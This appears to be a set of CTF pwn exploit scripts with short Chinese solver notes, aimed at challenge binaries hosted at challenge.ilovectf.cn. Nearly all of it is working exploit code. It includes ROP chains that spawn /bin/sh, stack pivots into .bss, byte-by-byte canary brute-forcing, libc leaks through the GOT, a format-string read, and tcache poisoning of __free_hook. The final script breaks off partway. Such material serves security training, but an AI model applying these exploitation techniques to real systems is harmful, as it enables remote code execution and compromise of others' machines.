    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
b *0x402723
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
c
c
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
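def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p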
p = start()


# Tube helpers; the helpers and exploit body below rely on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    return p.recv(x)


def rl(x):
    return p.recvline()[:x]


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()


def u64_ex(x):
    # Zero-pad short leaks to 8 bytes before unpacking.
    return u64(x.ljust(8, b'\0'))
def cmd(s):
    """Answer the menu (its last line is "5.Exit") with choice ``s``."""
    p.sendlineafter("5.Exit\n", s)
def insert(i, s, c='\0'):
    """Menu 1: create entry ``i`` of ``s`` bytes, then send ``c`` as its data (no newline)."""
    cmd(b'1')
    p.sendlineafter("Index:\n", itob(i))
    p.sendlineafter("Size:\n", itob(s))
    p.sendafter("Data:\n", c)
def erase(i):
    """Menu 2: delete entry ``i``."""
    cmd(b'2')
    p.sendlineafter("Index:\n", itob(i))
def edit(i, c='\0'):
    """Menu 3: overwrite entry ``i`` with ``c`` (sent without a newline)."""
    cmd(b'3')
    p.sendlineafter("Index:\n", itob(i))
    p.sendafter("Data:\n", c)
def show(i):
    """Menu 4: print entry ``i``."""
    cmd(b'4')
    p.sendlineafter("Index:\n", itob(i))
# Your exploit here
ru("'0' is goal")
# Move string for the board, then a short move cycle repeated three times
# (the goal cell keeps scoring, per the write-up above the script).
pay = "ddwwwwddddddsssdddwwwdsssasdd" + 3* "wddsawaasd"
sl(pay)
# Static addresses from the non-PIE binary; `ret` is defined but unused.
bss = 0x4045E0 +0x900
read_addr = 0x402712
pop_rdi_ret = 0x40264C
system = 0x402658
ret = 0x40265F
# Stage 1: 0x10 bytes of buffer, new rbp pointing into .bss, return into the
# read call so the next input lands at the pivoted frame.
pay = flat([
    b'a'*0x10,
    bss,
    read_addr,
])
sa("Congratulations to you!Give u a chance to sh\n",pay)
# Stage 2: chain placed at the pivoted frame; bss+0x20 is where "/bin/sh"
# ends up in this layout (assumed from the offsets — TODO confirm).
pay = flat([
    b'a'*0x10,
    bss + 0x200,
    pop_rdi_ret,
    bss + 0x20,
    system,
    b"/bin/sh",
])
sleep(1)
pause()
s(pay)
ia()
弥达斯之触
hyw
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-21 20:15:04

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "midas_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30000
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
b printf
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
c
c
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
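def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p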
p = start()


# Tube helpers; the helpers and exploit body below rely on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    return p.recv(x)


def rl(x):
    return p.recvline()[:x]


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()


def u64_ex(x):
    # Zero-pad short leaks to 8 bytes before unpacking.
    return u64(x.ljust(8, b'\0'))
def cmd(s):
    """Answer the menu (its last line is "5.Exit") with choice ``s``."""
    p.sendlineafter("5.Exit\n", s)
def insert(i, s, c='\0'):
    """Menu 1: create entry ``i`` of ``s`` bytes, then send ``c`` as its data (no newline)."""
    cmd(b'1')
    p.sendlineafter("Index:\n", itob(i))
    p.sendlineafter("Size:\n", itob(s))
    p.sendafter("Data:\n", c)
def erase(i):
    """Menu 2: delete entry ``i``."""
    cmd(b'2')
    p.sendlineafter("Index:\n", itob(i))
def edit(i, c='\0'):
    """Menu 3: overwrite entry ``i`` with ``c`` (sent without a newline)."""
    cmd(b'3')
    p.sendlineafter("Index:\n", itob(i))
    p.sendafter("Data:\n", c)
def show(i):
    """Menu 4: print entry ``i``."""
    cmd(b'4')
    p.sendlineafter("Index:\n", itob(i))
# Your exploit here
# The service echoes the input through printf; "%7$s" reads argument 7 as a string.
p.sendline("%7$s")
# 何意味?何意味?何意味?何意味?何意味?  (original note: "what does this mean?")
p.interactive()
那耳喀索斯
子进程可以用来爆 canary。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-18 22:09:40

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "narcissus"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30047
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach; the target forks, so gdb stays on the parent.
gs = '''
b main
b *0x401682
set follow-fork-mode parent
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
c
c
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
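def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p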
p = start()


# Tube helpers; the exploit body below relies on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    return p.recv(x)


# rl = p.recvline()


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()


def u64_ex(x):
    # Zero-pad short leaks to 8 bytes before unpacking.
    return u64(x.ljust(8, b'\0'))
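# Static gadget addresses from the non-PIE binary.
pop_rdi_ret = 0x401340
ret = 0x401341
# 不断溢出 1 byte 爆破子进程直到爆完 8 bytes.
# Recover the canary one byte at a time: a wrong byte makes the forked child
# report "smashing" while the parent keeps serving, so a guess can be retried.
# Only candidates 0..7 are tried per byte — presumably the challenge's canary
# bytes are that small; TODO confirm, otherwise the loop cannot terminate on a hit.
bss = 0x4040A0 + 0xa00
pay = b'a'*0x28 + b'\x00'
for i in range(2,9):
    for j in range(0,8):
        sa("我无法离开这里...\n",pay + bytes([j]))
        get = p.recvline().decode()
        print(get)
        if "smashing" in get:
            sla("你在湖中看见了什么?\n",b'sb')
            continue
        pay = pay + bytes([j])
        sl(b'sb')
        break
canary = u64_ex(pay[0x28:])
sla("我无法离开这里...\n",b'sb')
puts_got_addr = elf.got['puts']
puts_addr = 0x401615
# Stage 1: leak puts' libc address through the GOT, returning into the
# puts-call site so execution continues.
pay = flat([
    ("你的爱人...".encode()).ljust(0x18,b'\0'),
    canary,
    bss,
    pop_rdi_ret,
    puts_got_addr,
    puts_addr
])
sla("你在湖中看见了什么?",pay)
ru("我明白了\n")
# 0x80e50 / 0x50d70 are puts/system offsets for this libc build (as given).
libc_addr = u64_ex(r(6)) - 0x80e50
# (The original rebuilt the stage-1 payload a second time here and never
# sent it; that dead assignment is removed.)
system = libc_addr + 0x50d70
# Stage 2: "/bin/sh" is appended to the chain and bss+0x28 is assumed to be
# where it lands after the pivot — TODO confirm.
pay = flat([
    ("你的爱人...".encode()).ljust(0x18,b'\0'),
    canary,
    bss+0x100,
    pop_rdi_ret,
    bss+0x28,
    ret,
    system,
    b"/bin/sh\x00"
])
pause()
sl(pay)
p.success(hex(canary))
p.success(hex(libc_addr))
ia()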
[Week4]
cpcp
只要 [rbp-buf,rbp-buf+s] 能覆盖到 ret 时的 rsp 的位置,就能拿到控制流。
所以 call read 是可以利用的(
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-27 23:44:39

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30144
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
# b *0x401473
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
c
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
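def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p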
p = start()


# Tube helpers; the helpers and exploit body below rely on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    return p.recv(x)


def rl(x):
    return p.recvline()[:x]


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()


def su(x):
    return p.success(x)


def u64_ex(x):
    # Zero-pad short leaks to 8 bytes before unpacking.
    return u64(x.ljust(8, b'\0'))
def cmd(s):
    """Send ``s`` as a line once the "> " prompt appears."""
    p.sendlineafter("> ", s)
def write(pay):
    """Send ``pay`` in 8-byte pieces, each after a "> " prompt; an empty ``pay`` sends nothing.

    Iterative form of the original recursive helper (same chunking, same order).
    """
    for off in range(0, len(pay), 8):
        p.sendafter("> ", pay[off:off + 8])
# Your exploit here
# Static addresses from the non-PIE binary; pop_rbp_ret is defined but unused.
pop_rdi_ret = 0x4013a5
pop_rbp_ret = 0x40127d
puts_addr = 0x401110
# Advance the menu a fixed number of times before the overflowing input;
# the counts (18 then 5) come from the binary's flow — TODO confirm.
for _ in range(5 + 12 + 1):
    cmd(b'1')
for _ in range(5):
    cmd(b'1')
read_addr = 0x401462
# Stage 1: 0x78 bytes reach the return address; return into the read call.
pay = flat([
    b'\0'*0x78,
    read_addr,
])
write(pay)
cmd(b"end")
cmd(b"1")
# Stage 2: leak puts' libc address through the GOT, then read again.
pay = flat([
    b'a'*0x68,
    pop_rdi_ret,
    elf.got["puts"],
    puts_addr,
    read_addr
])
# pause()
# ru("Plz don't forget again!\n")
# sleep(1)
sa(b"Plz don't forget again!",pay)
rl(-1)
# 0x80e50 / 0x1d8678 / 0x50d70: puts, "/bin/sh" and system offsets for this libc build (as given).
libc_addr = u64_ex(r(6))-0x80e50
bin_sh = libc_addr + 0x1d8678
system = libc_addr + 0x50d70
# Stage 3: 0x68 + 0x18 bytes of padding this time (frame differs after stage 2).
pay = flat([
    b'a'*0x68,
    b'a'*0x18,
    pop_rdi_ret,
    bin_sh,
    system
])
pause()
s(pay)
su(hex(libc_addr))
ia()
heap?heap!
简单堆
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-25 10:01:35

Harness settings for this challenge: target binary, matching libc (2.31),
remote endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "code_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/libc6_2.31-0ubuntu9.17_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30677
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
b free
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/libc6-dbg_2.31-0ubuntu9.17_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.17/amd64/glibc-source_2.31-0ubuntu9.17_all/usr/src/glibc/glibc-2.31
c
c
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
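def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p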
p = start()


# Tube helpers; the helpers and exploit body below rely on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    return p.recv(x)


def rl(x):
    return p.recvline()[:x]


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()


def su(x):
    return p.success(x)


def u64_ex(x):
    # Zero-pad short leaks to 8 bytes before unpacking.
    return u64(x.ljust(8, b'\0'))
def cmd(s):
    """Answer the ">> " menu prompt with choice ``s``."""
    p.sendlineafter(">> ", s)
def insert(i, s, c='\0'):
    """Menu 1: allocate entry ``i`` of ``s`` bytes.  ``c`` is accepted for symmetry but unused (no content prompt here)."""
    cmd(b'1')
    p.sendlineafter("Index >> ", itob(i))
    p.sendlineafter("Size >> ", itob(s))
def erase(i):
    """Menu 2: free entry ``i``."""
    cmd(b'2')
    p.sendlineafter("Index >> ", itob(i))
def edit(i, c='\0'):
    """Menu 4: overwrite entry ``i`` with ``c`` (sent without a newline)."""
    cmd(b'4')
    p.sendlineafter("Index >> ", itob(i))
    p.sendafter("Content >> ", c)
def show(i):
    """Menu 3: print entry ``i``."""
    cmd(b'3')
    p.sendlineafter("Index >> ", itob(i))
# Your exploit here
# One unsorted-bin-sized chunk plus three small ones.
insert(1,0x418)
insert(2,0x18)
insert(3,0x18)
insert(4,0x18,)
# Entry 1 is shown after being freed: its fd field leaks a libc pointer.
erase(1)
show(1)
ru("content >> ")
# 0x1f1be0 is the leaked pointer's offset from libc base in this 2.31 build;
# the extra +0x5000 is as given in the original — reason not derivable here.
libc_addr = u64_ex(r(6)) - 0x1f1be0 + 0x5000
system = libc_addr + libc.sym["system"]
hook = libc_addr + libc.sym["__free_hook"]
# Entry 3 is edited after free so the next two allocations return it and then
# the hook address; entry 6 therefore overlaps __free_hook.
erase(2)
erase(3)
edit(3,p64(hook))
insert(5,0x18)
insert(6,0x18)
edit(6,p64(system))
pause()
edit(4,b"/bin/sh")
erase(4)
su(hex(libc_addr))
su(hex(system))
ia()
key 的大冒险(2)
只溢出到 rsp 可以栈迁移;只溢出到 rbp 可以任意地址写特定数值。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-25 10:34:11
'''
from pwncli import *
# Target selection: local binary and remote endpoint for this challenge.
filename = "103300_adventure2"
# glibc matching the remote; used for symbol offsets and the gdb source paths.
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6_2.31-0ubuntu9.18_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30123
# Only consulted by start() in DOCKER mode. Left empty here, so that mode
# cannot locate a process: an empty proc_name only matches a row whose CMD
# is empty.
container_id = ""
proc_name = ""
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb script used by start(): break at main, then continue twice. The two
# "set" lines point gdb at the debug symbols and sources of the libc above.
gs = '''
b main
# b *0x401B02
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6-dbg_2.31-0ubuntu9.18_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/glibc-source_2.31-0ubuntu9.18_all/usr/src/glibc/glibc-2.31
c
c
'''
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
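def start():
    """Open the target tube selected by the pwntools command-line switches.

    GDB    -> run the local binary under gdb with the ``gs`` script.
    REMOTE -> plain TCP connection to ``host``:``port``.
    DOCKER -> connect to ``host``:``port``, then attach a root gdb (via sudo)
              to the process called ``proc_name`` inside ``container_id``.
    (none) -> run the local binary without a debugger.

    Returns the pwntools tube; the exploit binds it to ``p``.
    Raises RuntimeError in DOCKER mode when no process in the container
    matches ``proc_name`` (the original indexed an empty list and died with
    an IndexError) or when the interactive selection is out of range.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    # Imported lazily so the docker SDK is only required for DOCKER mode.
    import docker
    import tempfile
    from os import path

    # Connect first so the per-connection service process exists when the
    # container is enumerated.
    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    top = container.top()
    rows = [dict(zip(top['Titles'], row)) for row in top['Processes']]

    # Match on the basename of the first word of CMD. A blank or
    # whitespace-only CMD yields '' (the original raised IndexError on the
    # whitespace-only case).
    candidates = []
    for row in rows:
        argv = row.get('CMD', '').split()
        exe = path.basename(argv[0]) if argv else ''
        if exe == proc_name:
            candidates.append(row)
    if not candidates:
        raise RuntimeError(
            f"no process named {proc_name!r} found in container {container_id!r}")

    idx = 0
    if len(candidates) > 1:
        for i, row in enumerate(candidates):
            print(f"{i} => {row}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(candidates):
            raise RuntimeError(
                f"selection {idx} out of range 0..{len(candidates) - 1}")

    # gdb reads the script by path after this function returns, so the file
    # must outlive the ``with`` (delete=False); its first line makes gdb
    # remove it once read. NamedTemporaryFile creates it owner-only, which
    # matters because gdb is started under sudo.
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', suffix='.gdb',
                                     mode='w', delete=False) as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
    print(tmp.name)
    run_in_new_terminal(
        ["sudo", "gdb", "-p", candidates[idx]['PID'], "-x", tmp.name])
    return p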
p = start()


# Short wrappers over the tube ``p`` so the exploit body stays terse.
def ia():
    """Hand the tube over to the user."""
    return p.interactive()


def sla(x, y):
    """Send line ``y`` once the prompt ``x`` has been received."""
    return p.sendlineafter(x, y)


def sa(x, y):
    """Send ``y`` (no trailing newline) once the prompt ``x`` has been received."""
    return p.sendafter(x, y)


def ru(x):
    """Receive up to and including ``x``."""
    return p.recvuntil(x)


def r(x):
    """Receive ``x`` bytes."""
    return p.recv(x)


def rl(x):
    """Receive one line and keep only its first ``x`` bytes."""
    return p.recvline()[:x]


def s(x):
    """Send raw bytes ``x``."""
    return p.send(x)


def sl(x):
    """Send ``x`` followed by a newline."""
    return p.sendline(x)


def itob(x):
    """Integer -> decimal ASCII bytes, the form the menus expect."""
    return str(x).encode()


def su(x):
    """Log ``x`` at success level."""
    return p.success(x)


def u64_ex(x):
    """Unpack a leak of up to 8 bytes, zero-padding on the right."""
    return u64(x.ljust(8, b'\0'))
def cmd(s):
    """Select menu entry ``s`` (bytes) at the "Choose an option: " prompt."""
    sla("Choose an option: ", s)
def buy(i):
    """Menu 4: buy item number ``i`` (1-3)."""
    cmd(b"4")
    sla("Enter the number of the item you want to buy (1-3): \n", itob(i))
def sell(i):
    """Menu 5: sell item number ``i`` (1-3)."""
    cmd(b'5')
    sla("Enter the number of the item you want to sell (1-3): \n", itob(i))
def equip(i):
    """Menu 6: equip item number ``i`` (1-3).

    This is the path that leads to the "say something to the village chief"
    prompt used for the overflow below.
    """
    cmd(b'6')
    sla("Enter the number of the item you want to equip (1-3): \n", itob(i))
# Churn item 3 five times (buy then sell) and buy two more. NOTE(review):
# indentation was lost in this listing; sell(3) is read as part of the loop.
# Presumably this sets up the money/inventory state the overflow relies on
# -- TODO confirm against the binary.
for _ in range(5):
    buy(3)
    sell(3)
for _ in range(2):
    buy(3)
# Address of the global the author labelled ``money``.
money = 0x40409C
equip(3)
# First overflow: 0x40 bytes of filler reach the saved rbp, which becomes
# money+0x10. Per the author's note above, reaching only rbp yields a write
# of a fixed value to a chosen address (the caller's rbp-relative store),
# not control of rip.
pay = flat([
    b'a' * 0x40,
    money + 0x10
])
sa("You want to say something to the village chief: \n", pay)
# The menu loop rejects twice while it resynchronises after the overflow;
# drain both error lines before continuing.
ru("Choose an option: Invalid option. Please try again.\n")
ru("Choose an option: Invalid option. Please try again.\n")
for _ in range(0x19):
    buy(3)
# Second overflow: same pivot value plus a return address. 0x401533 is a
